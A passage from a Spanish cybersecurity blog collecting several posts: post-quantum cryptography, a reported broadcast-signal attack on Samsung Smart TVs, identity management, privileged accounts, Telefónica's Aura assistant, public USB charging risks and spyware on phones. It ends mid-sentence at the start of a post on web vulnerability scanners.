Wysopal, Chris Eng, Melissa Elliot y Mark Kriegsman, el blog ofrece comentarios informados sobre los últimos temas de seguridad. Los temas favoritos incluyen pruebas de seguridad de aplicaciones, vulnerabilidades de software, hacking, seguridad móvil y más. ## 49. Data Gravity [Imagen: Blog Seguridad Data Gravity] Data Gravity está escrito por una colección de bloggers que contribuyentes en el espacio de la seguridad. Es un sitio visualmente atractivo que fue creado para ayudar a los profesionales de TI a encontrar respuestas a los desafíos de los datos de su negocio. ## 50. Ciberseguridad Blog [Imagen: Blog Seguridad Ciberseguridad.blog] Como número cincuenta, no podía dejar pasar la opción de poner nuestro propio blog. Un blog joven , pero creado con mucha ilusión. Blog Seguridad con contenido variado y apto para todas las personas que les interese el mundo de la seguridad informática, un blog abierto a quien quiera escribir uno o varios post y dejar su granito en la industria de la seguridad. ## 51. HackPlayers [Imagen: Blog Seguridad HackPlayers] El blog de Vicente Motos es uno de los más consagrados en el panorama InfoSec en castellano. Un ritmo de publicaciones espectacular, una al día, o al menos los días de trabajo. Información útil de todo tipo, de todo tipo de niveles técnicos y divulgación. Una de las mejores web tipo noticias seguridad. --- # La criptografía Post-Quantum URL: https://ciberseguridad.blog/la-criptografia-post-quantum/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-04-10 Actualizado: 2026-09-29 Tema: Cifrados y Algoritmos > La mayoría de la gente presta poca o ninguna atención al icono del candado en su barra de direcciones del navegador que significa la disponibilidad de HTTPS. No se dan cuenta de que hay un intercambio de claves para asegurar que las comunicaciones son seguras y una firma con los datos que asegura su integridad. Pero ¿y si esa conexión no es realmente confiable? El impacto en la economía mundial podría ser devastadora,viendose afectado el comercio electrónico, las aplicaciones , el almacenamiento La mayoría de la gente presta poca o ninguna atención al icono del candado en su barra de direcciones del navegador que significa la disponibilidad de HTTPS. No se dan cuenta de que hay un intercambio de claves para asegurar que las comunicaciones son seguras y una firma con los datos que asegura su integridad. Pero ¿y si esa conexión no es realmente confiable? El impacto en la economía mundial podría ser devastadora,viendose afectado el comercio electrónico, las aplicaciones , el almacenamiento, la bolsa de valores online, haciendo de cualquier sistema basado en HTTPS un sistema inútil. Pues este escenario será posible en un futuro no muy lejano. Los ordenadores cuánticos serán capaces de romper la infraestructura de claves públicas. Siendo esta, la columna vertebral de los sitios web seguros actuales. Investigadores de universidades y de distintas corporaciones, así como la NSA y el gobierno, están trabajando para crear un ordenador lo suficientemente potente que es capaz de terminar o romper las conexiones HTTPS. Afortunadamente, existen soluciones que pueden resistir los ataques de computación cuántica y evitar este Armagedón económico que resultaría de dicho peligro. En particular, mediante varias clases de nuevos algoritmos criptográficos, que actualmente se cree que resisten este tipo de ataques informáticos. Algoritmos basados en criptografía Post-Quantum. Sin embargo, los esfuerzos para reemplazar el cifrado asimétrico vulnerable y firmar algoritmos, incluyendo la omnipresente de RSA y ECC, deberian haber empezado multiples años atras, cuando las computadoras cuánticas no estaban tan accesibles ni disponibles. Es necesario comenzar a integrar algoritmos post-cuánticos en protocolos criptográficos desde ya. La Agencia de Seguridad Nacional (NSA, por sus siglas en inglés) anunció que está planificando la transición a un nuevo Cipher suite (Suite B) resistente a estos ataques cuánticos. ## Rompiendo la criptografía de clave pública Las comunicaciones HTTPS seguras actuales se basan en un intercambio de claves generadas por la criptografía asimétrica para asegurar que las partes son quienes dicen ser. Una vez que se intercambian estas claves, los datos se cifran con criptografía simétrica, como AES, y se firman con criptografía asimétrica, como RSA. En 1994, un matemático llamado Peter Shor, desarrolló un algoritmo de factorización de números enteros que se ejecuta en un ordenador cuántico. El algoritmo de Shor, como se sabe, puede encontrar factores primos para un entero dado sustancialmente más rápido que con el algoritmo de factoraje convencional más eficiente. Así, un ordenador cuántico con un número suficiente de qubits que ejecuten el algoritmo de Shor podría utilizarse para romper esquemas asimétricos de criptografía de clave pública, como los esquemas ampliamente utilizados por RSA y ECC. Los algoritmos simétricos populares, incluyendo AES, no han sido rotos por el Algoritmo de Shor. Sin embargo, otro método, llamado Algoritmo de Grover, reducirá efectivamente a la mitad los niveles de seguridad. Por ejemplo, AES-256 se renderizará igual que AES-128 ejecutando el algoritmo de Grover en un ordenador cuántico suficientemente potente. Por lo tanto, la criptografía simétrica post-cuántica no necesita cambiar significativamente de la criptografía simétrica actual, incrementando los niveles de seguridad actuales. ## Intercambio de claves y firmas digitales Existen dos procesos criptográficos que utilizan la criptografía asimétrica: El intercambio de claves y las firmas digitales. El intercambio de claves es el método por el cual las claves se intercambian entre dos partes. Si el remitente y el receptor desean intercambiar mensajes cifrados, cada uno debe poder cifrar y descifrar mensajes, que generalmente se hacen mediante un cifrado de clave simétrico y requiere que ambas partes tengan una copia de la misma clave. El intercambio de esa clave simétrica es manejado por infraestructuras de clave pública (PKI) en las que cada usuario aplica a una "autoridad de certificación" para un certificado digital que sirve como una autenticación de identidad. El peligro actual que enfrenta el intercambio de claves es que las organizaciones son capaces de registrar datos de Internet hoy y descifrarlo en una fecha posterior, siendo capaces de romper el algoritmo asimétrico (a través del algoritmo de Shor, por ejemplo) cuando se disponga de los medios. Las firmas digitales emplean criptografía asimétrica para dar al receptor la confianza de que el mensaje fue enviado por un remitente conocido (autenticación), que el remitente no puede negar haber enviado el mensaje (no repudio) y que el mensaje no fue alterado en tránsito (integridad) . Las firmas digitales se usan comúnmente para transacciones financieras, contratos, distribución de parches de software y otros casos donde la confianza y la seguridad es sumamente importante. Una vez que los ordenadores cuánticos sean capaces de romper las firmas, las amenazas serán generalizadas. Por ejemplo, un hacker podría romper una clave de actualización de software de Windows y enviar falsas actualizaciones (malware) a su computadora. ## Alternativas El más que cercano crecimiento de la computación cuántica no significa que la criptografía está muerta. Existen varias clases de sistemas criptográficos que actualmente se cree que resisten la computación cuántica, como pueden ser: - Criptografía basada en enrejado. Lattices soporta firmas digitales e intercambio de claves. El ejemplo más conocido es NTRU4 y NTRU MLS. - Criptografía de ecuaciones cuadráticas y multivariantes. Normalmente solo se admite en firmas. Ecuaciones de campo ocultas (HFE) son un ejemplo de esta clase de criptografía, al igual que el esquema Rainbow (Unbalanced Oil and Vinegar) - Criptografía basada en hash. Normalmente solo se admite en firmas. Basado en hash requiere hash árboles en combinación con una firma de tiempo llamado el esquema de firma Merkle (Árbol de Merkle). - Criptografía basada en código. El código apoya el intercambio de claves y actualmente no es práctico para la firma. Como ejemplos de cifrado basado en código tenemos los criptosistemas McEliece y Niederreiter y sus variantes tales como PQGuard, Wild McEliece y McBits. - Criptografía Isogenética de la Curva Eliptica Supersingular. Por lo general sólo admite el cifrado. Este sistema criptográfico crea un reemplazo de tipo Diffie-Hellman con secreto. En su gran mayoría, la criptografía Post-Quantum puede funcionar como una sustitución de la criptografía heredada, con algunas diferencias. Un inconveniente de muchos algoritmos de criptografía Post-Quantum es que requieren tamaños de clave más grandes que los algoritmos de clave pública populares actuales. Sin embargo, algunos esquemas ya tienen niveles de rendimiento comparables, o incluso significativamente mejores que los algoritmos Pre-Quantum. Además, se puede esperar que, con una atención adicional a estos nuevos esquemas, se mejore rápidamente. Como el tamaño de la clave, la eficiencia computacional y el tamaño de la firma afectan el rendimiento de un sistema, hacer una comparación entre estas soluciones es difícil. La mejor solución de criptografía Post-Quantum para una aplicación que transmite continuamente grandes cantidades de datos firmados puede no ser la mejor opción para una aplicación diferente que envía sólo unos pocos bytes intermitentemente. Para facilitar la transición, una solución intrigante, quizás un poco más costosa en términos de recursos, es encapsular los métodos actuales en los nuevos. Esto proporcionará una solución, que obtiene lo mejor de ambos métodos. Un ejemplo de esto es la propuesta Quantum Safe Hybrid ciphersuite siendo considerado por el IETF, en la que gracias al continuo aumento de la potencia informática, la sobrecarga generada por esta solución no debe ser un obstáculo importante. ## Criptografía Post-Quantum vs. Criptografía Cuántica La criptografía Post-Quantum es diferente de la criptografía cuántica, que es el uso de la tecnología cuántica para la comunicación y la computación para proteger los mensajes. El ejemplo más conocido de criptografía cuántica es Quantum Key Distribution (QKD), que es el proceso de usar la comunicación cuántica para establecer una clave compartida entre dos partes sin que un tercero aprenda nada sobre esa clave. Esto se consigue codificando los bits de la clave como datos cuánticos que serán perturbados si son observados por un tercero. La clave se utiliza entonces con técnicas de cifrado o autenticación simétricas convencionales. QKD se ha explicado, entre otras cosas, en un informe previo publicado por el Quantum-Safe Security Working Group. Es probable que los algoritmos QKD y los Post-cuánticos encuentren sus aplicaciones en el futuro mundo criptográfico post-cuántico. Se avecina un interesante cambio de mentalidad, un cambio de 360 grados en las metodologías tradicionales de hacer tecnología, gracias a los ordenadores cuánticos. Todo esto nos suena a ciencia ficción, a un futuro muy lejano, pero esta lejanía no es tan grande como pensamos, y el día que lleguen , debemos estar preparados con los algoritmos más seguros para brindar nuestra seguridad. --- # Hackear una Smart TV remotamente URL: https://ciberseguridad.blog/hackear-una-smart-tv-remotamente/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-04-02 Actualizado: 2026-10-04 Tema: Internet de las cosas > Descubrimos un nuevo ataque que usa señales de radio terrestres pudiendo hackear una amplia gama de Smart TV. Analizamos una perspectiva inquietante: la capacidad de los hackers para tomar el control total de un gran numero de sistemas a la vez sin tener acceso físico a ninguno de ellos. El exploit utilizado en la prueba de concepto utiliza un transmisor de bajo coste capaz de integrar comandos maliciosos en la señal de TV, transmitiendo dicha señal a los dispositivos cercanos. El exploit funci Descubrimos un nuevo ataque que usa señales de radio terrestres pudiendo hackear una amplia gama de Smart TV. Analizamos una perspectiva inquietante: la capacidad de los hackers para tomar el control total de un gran numero de sistemas a la vez sin tener acceso físico a ninguno de ellos. El exploit utilizado en la prueba de concepto utiliza un transmisor de bajo coste capaz de integrar comandos maliciosos en la señal de TV, transmitiendo dicha señal a los dispositivos cercanos. El exploit funcionó contra dos modelos de TV Samsung totalmente actualizados, explotando dos fallas de seguridad conocidas en los navegadores Web que se ejecutan en segundo plano, siendo capaces de obtener acceso privilegiado a los televisores. > Una vez que un hacker tiene control sobre la TV de un usuario final, puede dañar al usuario de varias maneras - Ars Rafael Scheel.(Descubridor del ataque) La TV podría utilizarse para atacar a otros dispositivos en la red doméstica o incluso para espiar al usuario con la cámara y el micrófono de la misma en caso de tenerlo. El descubrimiento de Scheel se basa en un transmisor de vídeo digital terrestre, estándar de transmisión que está integrado en la gran mayoría de los televisores. Los televisores que están conectados a Internet, están actualmente sintonizados en una estación basada en DVB-T, soportan el estándar de TV de banda ancha de transmisión híbrida y contienen al menos una vulnerabilidad crítica que puede ser explotada sin mostrar ningún signos externos. El ataque se demostró en Febrero en el Seminario de la Unión Europea de Radiodifusión sobre Medios de Comunicación Cibernética. El ataque demostró la posibilidad de conectarse remotamente al televisor a través de Internet, siendo capaces de tomar el control completo del dispositivo. Y lo mas inquietante es que el exploit fue capaz de sobrevivir a los reinicios del equipo, incluyendo la recuperación de la configuración de fábrica. Podemos ver el ataque y la demostración en este video: [Vídeo](https://www.youtube.com/watch?v=bOJ_8QHX6OA) Este ataque abre las puertas a los hacks de Smart TV, yendo mucho más allá de los que habíamos vistos hasta ahora, y es que los exploits anteriores requieren acceso físico al sistema destino. Pero el enfoque de Scheel, al contrario que los antiguos ataques, puede funcionar contra muchos televisores a la vez, eliminando la necesidad de que el atacante controle físicamente el dispositivo. El hacker sólo tiene que encender un transmisor que está dentro del alcance de un gran número de sistemas, como puede ser en un edificio de apartamentos o desde un balcón que está cerca de una televisión objetivo. Los hackers subrayan los riesgos de los llamados dispositivos "Internet de Cosas", de los cuales, la gran mayoría tienen acceso a la red y funcionalidades informáticas sin estar adecuadamente securizados. Los televisores y otros aparatos conectados a Internet casi de una forma estandarizada, carecen de sandboxing de aplicaciones y otras mitigaciones de exploits que en otros sistemas operativos en ordenadores y móviles son una parte estándar. Aún no solo esto, la gran mayoría de los dispositivos ejecutan versiones viejas de Linux y navegadores de código abierto que contienen vulnerabilidades críticas. Oren, uno de los autores de un exploit parecido en 2014 y publicado recientemente en Wikileaks, dijo a Ars: > Esta investigación es significativa porque los televisores son utilizados por un grupo demográfico fundamentalmente diferente al de los ordenadores. Las personas que usan TV no saben / no se preocupan por la seguridad, no están acostumbradas a recibir mensajes de seguridad en sus televisores, no tienen la disciplina de instalar actualizaciones de seguridad, etc. Se abre una nueva vía a explorar, y sobre todo a secularizar y tener presente. La ciberseguridad de los nuevos dispositivos y los IoT es la nueva palanca, para que dichas tecnologías avancen, sin comprometer o poner en riesgo los antiguos sistemas. --- # La gestión de identidad como principal preocupación para los CSO URL: https://ciberseguridad.blog/la-gestion-de-identidad-como-principal-preocupacion-para-los-cso/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-03-19 Actualizado: 2026-09-29 Tema: Gestion de Identidades y Accesos > Los principales líderes de seguridad del mundo nos indican que sus principales desafíos, se mueven en torno al nuevo papel crítico de la gestión de identidad en relación a los ciberataques. La movilidad continua y la computación en la nube son un arma de doble filo, en la que los innumerables beneficios que proporcionan están siendo marcados por la falta de seguridad y el riesgos entorno a la identidad. Todo esto se deriva deriva de las muchas discusiones entre los principales CIOs, CISOs y CSO Los principales líderes de seguridad del mundo nos indican que sus principales desafíos, se mueven en torno al nuevo papel crítico de la gestión de identidad en relación a los ciberataques. La movilidad continua y la computación en la nube son un arma de doble filo, en la que los innumerables beneficios que proporcionan están siendo marcados por la falta de seguridad y el riesgos entorno a la identidad. Todo esto se deriva deriva de las muchas discusiones entre los principales CIOs, CISOs y CSOs, que ven la gestión de identidad como la zona cero en la lucha contra los ciberataques. ## Se amplia el perímetro El perímetro de seguridad se ha desdibujado y, para todos los efectos, simplemente se ha desvanecido.Todo el mundo está en Internet, todo el tiempo, generando volúmenes ingentes de actividad. Al mismo tiempo, la mayoría de los empleados tienen poca conciencia de los riesgos de acceso y actividad que implica su uso en Internet. Esto está produciendo áreas de riesgo indefinidas, que las defensas declarativas no pueden resolver. Los mecanismos tradicionales de defensa perimetral carecen de conciencia de estos riesgos de acceso y actividad. ## La identidad como superficie de ataque Los datos ya no residen detrás de los Firewall. Ese singular punto de control de protección ha desaparecido. En su lugar, existe un desafío de seguridad TI híbrido mucho más complejo, de entornos locales conectados a múltiples aplicaciones en la cloud y múltiples dispositivos móviles, corporativos o no. > Hay sólo dos tipos de empresas: las que fueron hackeadas y las que aún no saben que fueron hackeadas Hoy en día, los ataques contra las empresas son muy probables que sean furtivos y orientados, y sobre todo, basados ​​en vulnerabilidades de gestión de identidades. Individuos altamente cualificados, profesionales de TI con un vasto conocimiento de las formas más eficaces de atacar vulnerabilidades en empresas, llevan a cabo estos ataques. Estas personas se mueven silenciosa y metódicamente dentro de las organizaciones, a veces durante años, adquiriendo el conocimiento que necesitan para realizar los ataques. Y en el centro de las amenazas más actuales está el uso indebido y el compromiso de la identidad, que dan a los atacantes el acceso a la llave de los distintos candados. La identidad es un riesgo crítico de acceso. ## Las preocupaciones de los CSOs Cuando a los principales CSO se les pide que vean la seguridad a través de la gestión de identidad, estos es lo que comentan y sugieren, sus principales preocupaciones, y sus puntos de mira: - El impacto en la seguridad y los desafíos impuestos por la cloud y la movilidad en la protección de ambientes operativos híbridos. - Gary Eppinger - Comprometer y hace mal uso de las cuentas, amenazas internas y cómo implementar un modelo de "defensa resiliente" que hace difícil a los atacantes disponer de los datos una vez que se haya comprometido un entorno. - Jerry Archer - Las defensas de seguridad existentes fueron construidas para proteger una arquitectura de empresa que ya no existe, donde la industria necesita ir hacia el maching learning y el big data. - Joe Sullivan - Es necesario un nuevo enfoque que sitúe la identidad y el acceso en el centro de la seguridad para proteger los activos tanto digitales como físicos. - Teri Takai - Debemos comprender las palancas detrás de la innovación en seguridad y por qué las defensas avanzan en incrementos tan pequeños. - Robert Rodriguez, Presidente y Fundador de la Red de Innovación en Seguridad (SINET) - El machine learning y la analítica de comportamiento a través de una variedad de casos de uso. - Leslie K. Lambert - Tenemos que descubrir las limitaciones del procesamiento humano y desarrollar alternativas tecnológicas para encontrar y responder a riesgos y amenazas desconocidas. - Gary Harbison Como podemos ver, y tras leer las preocupaciones detrás de estos grandes expertos, podríamos resumirlas o concentrarlas, o yo al menos lo hago, en dos grandes lecciones : Por un lado, que la gestión de identidad es el epicentro de la gran mayoría de los ataques de ciberseguridad, y por otro, que los nuevos y sofisticados ataques, serán tan nuevos y sofisticados, que deberemos ayudarnos del tan conocido y últimamente nombrado "maching learning" . Me atrevería a decir que la gestión de identidad, es un tema pendiente por parte de la gran mayoría de las empresas. Y que actualmente estamos en el momento idóneo o necesario de abordarlo, ya que como hemos visto, es la zona cero o epicentro de los ataques, por lo que no podremos avanzar en nuestra seguridad, hasta que no avancemos en nuestra gestión de identidad. --- # Los usuarios privilegiados son como las croquetas URL: https://ciberseguridad.blog/los-usuarios-privilegiados-son-como-las-croquetas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-03-05 Actualizado: 2026-09-29 > Este fin de semana, tras un viaje a ver a la familia al pueblo y por consiguiente, la típica carga de tuppers [https://es.wikipedia.org/wiki/Tupperware], lo he visto claro, los usuarios privilegiados son como las croquetas. En este punto estaréis diciendo, "pero este tío que me esta contando" , yo también lo estaría diciendo la verdad, pero para sacaros de dudas, os voy a pasar a detallar este parecido que os comento. Croquetas para todos Cada vez que nos ponemos a hacer croquetas, o por lo men Este fin de semana, tras un viaje a ver a la familia al pueblo y por consiguiente, la típica carga de tuppers, lo he visto claro, los usuarios privilegiados son como las croquetas. En este punto estaréis diciendo, "pero este tío que me esta contando" , yo también lo estaría diciendo la verdad, pero para sacaros de dudas, os voy a pasar a detallar este parecido que os comento. ## Croquetas para todos Cada vez que nos ponemos a hacer croquetas, o por lo menos a mi madre le ocurre, las hace para todo el barrio. Cuestión que podríamos asemejar a los usuarios privilegiados en los proyectos. Cuando nos iniciamos en un proyecto nuevo, solicitamos o creamos usuarios privilegiados en exceso, con la excusa del "es que ..." , es que si no, se me puede paralizar el proyecto, puedo necesitarlo en cualquier momento ... Es que ... me puede sacar de un apuro si viene alguien a cenar y no tengo nada preparado, como diría mi madre, y con ese "es que" termina llenado el congelador de cantidades ingentes de croquetas. Exactamente igual que si nos descuidamos y no cuidamos los usuarios privilegiados, terminaremos llenando nuestros sistemas de cantidades ingentes de usuarios privilegiados. ## Según profundizas van saliendo mas Al igual que cuando hacemos un levantamiento de la situación del estado de los usuarios privilegiados en nuestra compañía , nos pasa exactamente igual que cuando mi madre hace la carga de tuppers, según vamos adentrándonos en el congelador .... van saliendo croquetas. Siempre, claro está, unido a la frase de "anda, no sabia que tenia estas croquetas aquí", situación muy similar a los usuarios privilegiados, que en su día pedimos por los " es que ..." de los proyectos, y que con el tiempo, nos sorprendemos al encontrar cuando profundizamos en el congelador de nuestra compañía. ## No sabes de que son Como antes comentábamos, nos vamos encontrando según profundizamos, con mas usuarios privilegiados, que al igual que nos pasa con las croquetas, nos generan una tremenda duda.¿ Serán de jamón, serán de cocido , de bacalao , jamon de york ... ?. Con los usuarios privilegiados nos pasa exactamente igual. Usuarios privilegiados que pedimos en su día, que es posible que necesitemos, pero que no sabemos exactamente de que eran o para que se utilizaban, y que solo llegaremos a saberlo cuando los "abramos" o analicemos. ## Añoranza del usuario privilegiado Independientemente de si estuviste de Erasmus o si llevas viviendo fuera de casa una cierta temporada, todo el mundo echa de menos las croquetas de su madre.Sensación idéntica a la falta que echan los distintos administradores de los usuarios privilegiados privilegiados cuando no los tienen. Es por ello, que debemos dosificar su uso con cabeza, identificando los momentos en lo que debemos utilizarlos, para así, no caer en el error de crear usuarios privilegiados en exceso. Debemos etiquetarlos y conocer "de que son" o que es lo que hacen, para así , utilizarlos correctamente cuando alguien venga a cenar, pudiendo ofrecer, los que nuestros invitados deseen, ya bien sean croquetas de jamón, cocido u otro. --- # Aura URL: https://ciberseguridad.blog/aura/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-02-26 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Aura es el asistente de inteligencia cognitiva de Telefonica, capaz de ayudarte en todo lo referente a tus datos dentro de la operadora. ¡ Conocelo ! Hace unos meses, ya empezamos a escuchar por parte del presidente de Telefónica, Jose Maria Alvarez Pallete, que nos mostraría algo sorprendente en el World Mobile Congress. Hoy ese anuncio se ha presentado, materializando un proyecto en el que Telefonica lleva trabajando meses al mando de Chema Alonso. Un concepto que permitirá a los clientes gestionar los datos que posee el operador, datos como, por ejemplo, las películas que ha consumido en su Movistar +. ## Aura [Imagen: AURA] Hoy a sido un gran día , en el que Telefonica a anunciado AURA. La nueva app de inteligencia cognitiva que nos permitirá controlar nuestros datos. > La inteligencia cognitiva nos permitirá comprender mejor a nuestros clientes, que se relacionen con nosotros de una forma más natural y generar una nueva relación de confianza con ellos - José María Álvarez Pallete. La interación en Aura, podemos verla presente cuando preguntamos y gestionamos servicios a travaes de nuestra voz. Seremos capaces de solicitar recomensaciones en la programación de la televisión, conocer cuando emiten un partido de futbol, el proximo capítulo de nuestra serie favorita, solicitar que se deniege el acceso o se corte el mismo de un dispositivo determinado, o crear una wifi de invitados. Una inteligencia artificial que surge de la mano de Microsoft y se alimenta de los propios datos de Telefónica. El 45% de todas las llamadas a la compañía son asuntos relacionados con las facturas o clientes que preguntaban cuántos datos habían dejado, ha comentado Chema Alonso. Por ello, empujar ese tráfico a través de Aura reducirá el gasto en personal de atención al cliente, apoyando que los mismos optan por el 'autoservicio' usando tecnología de inteligencia artificial. Si tiene éxito, Aura podría ser uno de los primeros motores de los recortes de empleo provocados por la tecnología basada en Inteligencia Artificial . Pero tenemos que tener clara una cuestión que seguro os habeis planteado a estas alturas del artículo. Aura no era un competidor de servicios como Alexa de Amazon o el Asistente de Google, ya que se apoyaría en utilizar la metodología de los mismos para realizar tareas sobre los datos en lugar de responder a las consultas. En la demostración de Chema Alonso, hemos podido ver como se a utilizado Aura para apagar temporalmente la conexión wifi al iPad en su casa o preguntar cómo podía ver el partido del Barcelona que estaba teniendo lugar durante la misma presentación. Los clientes tendran más control sobre el uso de sus datos, sin vender los mismo generados por Aura sin el permiso de un clientes. Un concepto importante respaldado, tanto por Facebook como por Unicef. Unicef ​​ha comentado que la inteligencia artificial podría ser utilizada para seguir la extensión de una enfermedad o epidemia si los usuarios optaran por servicios como Aura. Facebook también respaldó la tecnología y ha dicho que se podría utilizarse para aumentar la eficacia de su servicio de "chequeo de seguridad" que controla a los usuarios durante los desastres naturales. > Este es un territorio desconocido. No sabemos qué realidad artificial o realidad aumentada será, pero sabemos que en Telefónica esto será algo grande - J.M. Alvarez-Pallette. Por último, comentaros que Aura se lanzará en el próximo año en mercados como España, Reino Unido y Brasil. En mi opinión, un lanzamiento ilusionante y disruptivo, necesario , y que cambiara las reglas del juego. Acaba de nacer una nueva tendencia, por que cuando se hacen las cosas bien, los demás, quieren hacerlo igual ## Que es Aura Aura es el asistente de inteligencia cognitiva de Telefonica, capaz de bloquearnos un dispositivo conectado a nuestra wifi , recomendarnos una película , darnos información conectada con Facebook y mucho más. Pero claro, es muy fácil decirlo, por lo que lo mejor es ver las demostraciones de AURA : [Vídeo](https://www.youtube.com/watch?v=luv3ZoO3GxQ) --- # La inconsciencia de usar puertos USB públicos URL: https://ciberseguridad.blog/la-inconsciencia-de-usar-puertos-usb-publicos/ Tipo: Artículo Autor: Luis Melon Publicado: 2017-02-21 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > De acuerdo con un artículo publicado recientemente en CNN [http://money.cnn.com/2017/02/15/technology/public-ports-charging-bad-stop/index.html] , cargar tu teléfono en puertos USB públicos es un riesgo para la seguridad de tú teléfono. Sé que la tentación es alta, la sensación de tener la batería baja, ese agobio de que tu teléfono se va a quedar sin batería y no vas a poder mandar más mensajes en el whatsapp, colgar el último tweet, subir una actualización en el Facebook o hacerte un selfie. De acuerdo con un artículo publicado recientemente en CNN, cargar tu teléfono en puertos USB públicos es un riesgo para la seguridad de tú teléfono. Sé que la tentación es alta, la sensación de tener la batería baja, ese agobio de que tu teléfono se va a quedar sin batería y no vas a poder mandar más mensajes en el whatsapp, colgar el último tweet, subir una actualización en el Facebook o hacerte un selfie. Tu móvil está a punto de morir, pero de repente ves un puerto USB o un cargador público y tu cuerpo te pide conectar el móvil y sentir el alivio de que vas a llegar al final del día con batería suficiente. Pues hay que resistir a esa tentación y tener cuidado y ser muy conscientes de dónde enchufamos nuestro móvil, ese alivio de cargar el móvil se puede truncar en el peligro de un atacante invisible recolectando información mientras el teléfono está conectado a un enchufe “hackeado”. Simplemente conectando tu teléfono a un cargador comprometido, tu dispositivo puede ser infectado y así comprometer todos tus datos. Los puntos de carga públicos y los puntos de acceso wi-fi se pueden encontrar en lugares como aeropuertos, aviones, centros de conferencias y centros comerciales. Pero conectar tu teléfono a uno de estos puertos desconocidos o puntos de acceso tiene sus riesgos. El cable que utiliza para cargar el teléfono también se utiliza para enviar datos desde tu teléfono a otros dispositivos. Por ejemplo, cuando conectas tu iPhone a tu Mac con el cable de carga, puedes descargar fotos desde el teléfono al ordenador. > Si un puerto USB está comprometido, no hay límite a la información que un hacker podría tomar. Esto incluye tu correo electrónico, mensajes de texto, fotos y contactos, lo que se llama “juice jacking”. En 2016 se demostró cómo se podía hacer "video jacking" usando puertos hackeados y así poder grabar todo lo que escribes y miras. A pesar de los riesgos, la gente lo sigue haciendo todo el tiempo. Es más importante tener el perfil de Facebook actualizado que la protección de tus datos. [Imagen: rsaconference-compressor] Pero no os penséis que esto sólo lo hace gente de bajo conocimiento en seguridad, incluso en importantes conferencias de seguridad se realiza esta práctica. Hace poco en la conferencia de seguridad RSA conference en San Francisco, Authentic8 instaló una estación de carga en su stand, ofreciendo cables para que las personas cargaran sus dispositivos. Esta empresa, Authentic8, realizó un experimento social para ver cuanta gente cargaría sus teléfonos en este punto, y el dato que obtuvo es que alrededor del 80% de asistentes conectaron sus teléfonos sin preguntar por la seguridad. La conclusión es que no debemos utilizar ni puertos USB públicos, y si lo utilizamos tenemos que utilizar cables que no transfieran datos. Mi recomendación es utilizar siempre tu propio cargador y conectarlo a un enchufe o llevar una batería portátil, que además tiene el beneficio que no te tienes que quedar parado en un punto esperando a que se cargue tu teléfono para enviar un selfie. --- # El error de apuntar el smartphone a información confidencial URL: https://ciberseguridad.blog/el-error-de-apuntar-el-smartphone-a-informacion-confidencial/ Tipo: Artículo Autor: Luis Melon Publicado: 2017-02-20 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > ¿Quién no ha utilizado la linterna de su smartphone para iluminar algo? Muchas veces utilizamos la linterna para poder leer documentos en lugares con poca luz. No pasa nada si lo que queremos iluminar es la carta de bebidas en un pub por la noche, ya que no suele haber mucha luz. Pero lo que no debemos hacer es iluminar de esta forma documentos que consideremos "confidenciales". Os preguntaréis ¿por qué?, pues la razón es que al lado de la luz del móvil está la cámara del teléfono, y ahora os ¿Quién no ha utilizado la linterna de su smartphone para iluminar algo? Muchas veces utilizamos la linterna para poder leer documentos en lugares con poca luz. No pasa nada si lo que queremos iluminar es la carta de bebidas en un pub por la noche, ya que no suele haber mucha luz. Pero lo que no debemos hacer es iluminar de esta forma documentos que consideremos "confidenciales". Os preguntaréis ¿por qué?, pues la razón es que al lado de la luz del móvil está la cámara del teléfono, y ahora os pregunto yo, ¿estáis totalmente seguros de que vuestro teléfono está totalmente limpio y es seguro? Ahora estaréis dudando y hacéis bien porque no existe nada que podamos garantizar que es 100% seguro. Os voy a poner ahora un ejemplo de lo que podría haber sido un fuga de datos confidenciales, relacionada con lo que estamos hablando, y que le ha ocurrido nada más y nada menos que al nuevo presidente de los EE.UU. Donald Trump. [Imagen: Ciberseguridad Donal Trump] La pasada noche del Sábado 11 de Febrero, el presidente Donald Trump se encontraba cenando con el primer ministro japonés Shinzo Abe en el club privado Mar-a-Lago, debido a la cumbre entre ambos mandatarios. Durante la cena Corea del Norte lanzó un misil balístico creando así una crisis de la cual ambos dirigentes tenían que ser informados. A ambos se le entregaron documentos confidenciales con los detalles de lo sucedido, pero debido a la poca iluminación los asistentes, entre ellos periodistas ayudaron con las linternas de sus móviles a iluminar dichos documentos. Podemos suponer que los móviles del personal cercano al presidente son revisados periódicamente, pero ¿qué hay de los otros? La respuesta es que le han podido dar a un atacante documentos confidenciales y muy bien iluminados. ¿Cómo puede llegar spyware a tu teléfono? Una persona puede hacer clic en un enlace malicioso y descargar una aplicación aparentemente inofensiva que pide permiso para acceder a partes de tu teléfono, como la cámara y el micrófono. O los hackers pueden explotar bugs desconocidos en el código de un dispositivo y ejecutar su propio código, tomando el control de ciertas partes del teléfono y sus datos. Si hablamos del tipo de dispositivos que las personas usan día a día, es absolutamente posible comprometer un teléfono, acceder a la cámara, la grabación, y a la información sobre el dispositivo. Esto sucede mucho más en Android que en iPhone. Es más difícil comprometer iPhones, pero no imposible. El año pasado se descubrió una vulnerabilidad de iOS dirigida a periodistas y trabajadores de derechos humanos. Apple lanzó un parche para corregir las vulnerabilidades inmediatamente después de que se revelaran. > En 2016 se han encontrado vulnerabilidades de seguridad que potencialmente afectaron a 900 millones de teléfonos Android. Es muy difícil encontrar un teléfono Android bien securizado. Hay una gran variedad de versiones personalizadas de Android hechas por los fabricantes de teléfonos y algunas operadoras, cada una de las cuales puede introducir nuevas vulnerabilidades. Se puede garantizar una mayor seguridad comprando los teléfonos más nuevos directamente de Google e instalando regularmente actualizaciones. Lo que es de extrañar es que siendo la seguridad de la información un tema en el que se hizo mucho hincapié en las últimas elecciones haya estos errores de seguridad alrededor de información clasificada, como aparte de lo comentado que otros comensales tomando estuvieran tomando fotos de la sesión de estrategia de Trump y publicándolos en Facebook. --- # 10 herramientas para escanear vulnerabilidades web URL: https://ciberseguridad.blog/10-herramientas-para-escanear-vulnerabilidades-web/ Tipo: Artículo Autor: Luis Melon Publicado: 2017-02-17 Actualizado: 2026-09-29 Tema: Herramientas para hackear > Voy a 